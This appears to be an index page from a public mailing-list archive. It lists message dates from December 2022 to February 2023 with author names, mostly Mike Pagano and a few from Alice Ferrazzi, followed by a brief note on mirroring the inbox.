2023-02-09 12:49 Mike Pagano
2023-02-09 12:47 Mike Pagano
2023-02-09 12:40 Mike Pagano
2023-02-09 12:34 Mike Pagano
2023-02-06 12:46 Mike Pagano
2023-02-02 19:02 Mike Pagano
2023-02-01  8:05 Alice Ferrazzi
2023-01-24  7:19 Alice Ferrazzi
2023-01-22 14:59 Mike Pagano
2023-01-18 11:29 Mike Pagano
2023-01-14 13:48 Mike Pagano
2023-01-12 15:25 Mike Pagano
2023-01-12 12:16 Mike Pagano
2023-01-07 11:10 Mike Pagano
2023-01-04 11:37 Mike Pagano
2022-12-31 15:28 Mike Pagano
2022-12-21 19:05 Alice Ferrazzi
2022-12-16 20:25 Mike Pagano
2022-12-16 19:44 Mike Pagano
2022-12-11 23:32 Mike Pagano
2022-12-11 14:28 Mike Pagano

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox